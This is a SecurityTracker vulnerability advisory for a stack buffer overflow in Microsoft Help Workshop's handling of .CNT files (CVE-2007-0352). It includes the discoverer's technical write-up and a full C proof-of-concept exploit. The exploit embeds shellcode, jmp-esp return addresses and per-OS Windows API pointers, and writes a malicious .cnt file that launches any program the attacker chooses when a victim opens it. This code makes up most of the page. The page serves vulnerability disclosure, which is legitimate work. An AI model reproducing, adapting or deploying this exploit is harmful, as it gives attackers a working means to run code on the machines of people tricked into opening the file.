SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (Generic)  >   Microsoft Help Workshop Vendors:   Microsoft
Microsoft Help Workshop Buffer Overflow in Processing '.CNT' Files Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1017530
SecurityTracker URL:  http://securitytracker.com/id/1017530
CVE Reference:   CVE-2007-0352   (Links to External Site)
Updated:  May 19 2008
Original Entry Date:  Jan 18 2007
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 4.03.0002
Description:   A vulnerability was reported in Microsoft Help Workshop. A remote user can cause arbitrary code to be executed on the target user's system.

A remote user can create a specially crafted '.CNT' help contents file that, when loaded by the target user, will trigger a stack overflow and execute arbitrary code on the target system. The code will run with the privileges of the target user.

Microsoft Visual Studio 6.0 SP6 and Microsoft Visual Studio 2003 (.Net) include the vulnerable component.

porkythepig discovered this vulnerability.

A demonstration exploit is available at:

http://www.anspi.pl/~porkythepig/visualization/cnt-expl1.cpp

Impact:   A remote user can create a file that, when loaded by the target user, will execute arbitrary code on the target user's system.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.microsoft.com/ (Links to External Site)
Cause:   Boundary error
Underlying OS:   Windows (Any)

Message History:   None.


 Source Message Contents

Date:  17 Jan 2007 20:57:04 -0000
Subject:  Microsoft Help Workshop .CNT contents files buffer overflow

Description:

There is a stack based memory corruption in Microsoft Help Workshop
while processing .CNT Help Contents files, 
The tool is standard component of Microsoft Visual Studio 6.0 and 2003 (.NET)
for building and managing help projects
and could be also downloaded alone from the Microsoft download center.


Affected vendor:

Microsoft


Impact:

Remote code execution


Attack vector:

An attacker must construct malformed .cnt file and induce victim to
open it with the tool, or if Help Workshop has been launched
in the past (after first launch it associates the .cnt files with itself),
to launch the malicious file by doubleclicking/selecting for editing.


Technical Details:

The stack based buffer overflow occurs in Microsoft Help Workshop
while processing .cnt files.Each potentialy vulnerable line is 
constructed with the "%d %s" format ,
example:

1 SomeContentsDescription

and placed by the program before processing in the static
buffer, which overflows itself because of lack of input data boundary
check.
When the overflow occurs, the EIP register value is set to the DWORD value
placed 526 bytes counting from the beginning of 'SomeContentsDescription' string.
The ESP is set to DWORD value placed 534 bytes counting from the beggining of 
the string.
The process control can be therefore intercepted by the attacker by 
redirecting the instruction flow to the attackers provided code within the .cnt file.


Vulnerable software:

Microsoft Help Workshop v4.03.0002
Microsoft Visual Studio 6.0 SP6
Microsoft Visual Studio 2003 (.Net)



Exploit:

Proof of Concept exploit has been included at the end of the advisory.
After compiled, it will produce .cnt exploit files that 
after succesfull exploitation should spawn user specified process 
(by default notepad.exe), in the user specified OS enviroment.
The exploit can be also found at:
www.anspi.pl/~porkythepig/visualization/cnt-expl1.cpp


Credits:

Vulnerability discovered and researched by: porkythepig
Exploit by: porkythepig
porkythepig@anspi.pl










/////////////////////////////////////////////////////////////
//*****************
//
//  PoC exploit for .cnt files buffer overflow vulnerability in 
//  Microsoft Help Workshop v4.03.0002
//  The tool is standard component of MS Visual Studio v6.0, 2003 (.NET)
//
//  vulnerability found / exploit built by porkythepig
//
//*****************

#include "stdio.h"
#include "stdlib.h"
#include "string.h"
#include "memory.h"

#define STR01 "0 Microsoft Help Workshop PoC exploit by porkythepig    "
#define DEF_SPAWNED_PROCESS "notepad.exe"
#define EXPL_SIZE 619
#define PROC_NAM_SIZ 66
#define RET_OFFSET 0x210
#define PROC_NAME_OFFSET 0x228
#define BACK_SEQ_OFFSET 0x218
#define EXPRO_OFFSET 0xbf
#define GETSTAR_OFFSET 0x4a
#define CREPRO_OFFSET 0xb5
#define GETWINDIR_OFFSET 0x65

typedef struct
{
	unsigned int extPro;
	unsigned int getStarInf;
	unsigned int crePro;
	unsigned int getWinDir;
	unsigned int jmpEspPtr;
}ApiPtrs;

ApiPtrs osApiPtrs[5]=
{
	0x793f69da,0x793f6b7a,0x793f5010,0x793f2d23,0x7cfdbd1b, 
	0x7c4ee01a,0x7c4f49df,0x7c4fc0a0,0x7c4e9cFF,0x784452e4, 
	0x7c5969da,0x7c596b7a,0x7c595010,0x7c592d23,0x7d0812e4, 
	0x7c81cdda,0x7c801eee,0x7c802367,0x7c821363,0x7cc58fd8, 
	0x77e75cb5,0x77e6177a,0x77e61bb8,0x77e705b0,0x775e6247  
};

unsigned char shlCode[]=
{
	0x66,0x83,0xc4,0x10,0x8b,0xc4,0x66,0x81,
	0xec,0x10,0x21,0x50,0x66,0x2d,0x11,0x11,
	0x50,0xb8,0x7a,0x6b,0x3f,0x79,0xff,0xd0,
	0x58,0x50,0x80,0x38,0x20,0x74,0x49,0x5b,
	0x53,0x33,0xc0,0xb0,0xff,0x50,0x66,0x81,
	0xeb,0x11,0x05,0x53,0xb8,0x23,0x2d,0x3f,
	0x79,0x3c,0xff,0x75,0x02,0x32,0xc0,0xff,
	0xd0,0x58,0x50,0x66,0x2d,0x11,0x05,0x32,
	0xdb,0x38,0x18,0x74,0x03,0x40,0xeb,0xf9,
	0x5b,0x53,0x32,0xd2,0xb1,0x5c,0x88,0x08,
	0x40,0x38,0x13,0x74,0x08,0x8a,0x0b,0x88,
	0x08,0x43,0x40,0xeb,0xf4,0x32,0xd2,0x88,
	0x10,0x58,0x50,0x66,0x2d,0x11,0x05,0x48,
	0x40,0x8b,0xd0,0x58,0x50,0x66,0x2d,0x11,
	0x11,0x50,0x33,0xc9,0x51,0x51,0x51,0x51,
	0x51,0x51,0x51,0x52,0xb8,0x10,0x50,0x3f,
	0x79,0xff,0xd0,0x33,0xc0,0x50,0xb8,0xda,
	0x69,0x3f,0x79,0xff,0xd0
};

unsigned char backSeq[]=
{ 
	0xe9,0x1b,0xfe,0xff,0xff 
};

char buf0[EXPL_SIZE];
char spawnProcess[PROC_NAM_SIZ];
char *outName;
int osId;
int defProc;

void CompileBuffer()
{
	int ptr=0;

	memset(buf0,'1',EXPL_SIZE);
	ptr+=sprintf(buf0,"%s",STR01);
	memcpy(buf0+ptr,shlCode,sizeof(shlCode));
	memcpy(buf0+BACK_SEQ_OFFSET,backSeq,sizeof(backSeq));

	*((unsigned int*)(buf0+EXPRO_OFFSET))=osApiPtrs[osId].extPro;
	*((unsigned int*)(buf0+GETSTAR_OFFSET))=osApiPtrs[osId].getStarInf;
	*((unsigned int*)(buf0+CREPRO_OFFSET))=osApiPtrs[osId].crePro;
	*((unsigned int*)(buf0+GETWINDIR_OFFSET))=osApiPtrs[osId].getWinDir;
	*((unsigned int*)(buf0+RET_OFFSET))=osApiPtrs[osId].jmpEspPtr;

	ptr=PROC_NAME_OFFSET;
	if(!defProc)
	{
		buf0[ptr]=32;
		ptr++;
	}
	sprintf(buf0+ptr,"%s",spawnProcess);

	printf("Exploit buffer compiled\n");
}

void WriteBuffer()
{
	FILE *o;

	o=fopen(outName,"wb");
	if(o==NULL)
	{
		printf("Cannot open file for writing\n");
		exit(0);
	}
	
	fwrite(buf0,EXPL_SIZE,1,o);
	fclose(o);

	printf("Output .cnt file [ %s ] built successfully\n",outName);
}

void ProcessInput(int argc, char* argv[])
{
	printf("\nMicrosoft Help Workshop 4.03.0002 .cnt files exploit\n");
	printf("Vulnerability found & exploit built by porkythepig\n");
	
	if(argc<3)
	{
		printf("Syntax: exploit.exe os outName [spawnProc]\n");
		printf("[ os ]        host OS, possible choices:\n");
		printf("                0   Windows 2000 SP4 [Polish] updates on 11.01.2007\n"); 
		printf("                1   Windows 2000 SP4 [English]\n"); 
		printf("                2   Windows 2000 SP4 [English] updates on 11.01.2007\n");
		printf("                3   Windows XP Pro SP2 [English] updates on 11.01.2007\n");
		printf("                4   Windows XP Pro [English]\n");
		printf("[ outName ]   output .cnt exploit file name\n");
		printf("[ spawnProc ] *optional* full path to the process to be spawned by\n");
		printf("               the exploit (if none specified default will be notepad.exe)\n");
		exit(0);
	}

	osId=atol(argv[1]);
	if((osId<0)||(osId>4))
	{
		exit(0);
	}

	outName=argv[2];

	if(argc>3)
	{
		if(strlen(argv[3])>=PROC_NAM_SIZ) 
		{
			exit(0);
		}
		strcpy(spawnProcess,argv[3]);
		defProc=0;
	}
	else
	{
		strcpy(spawnProcess,DEF_SPAWNED_PROCESS);
		defProc=1;
	}
}

int main(int argc, char* argv[])
{

	ProcessInput(argc,argv);
	CompileBuffer();
	WriteBuffer();

	return 0;
}

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC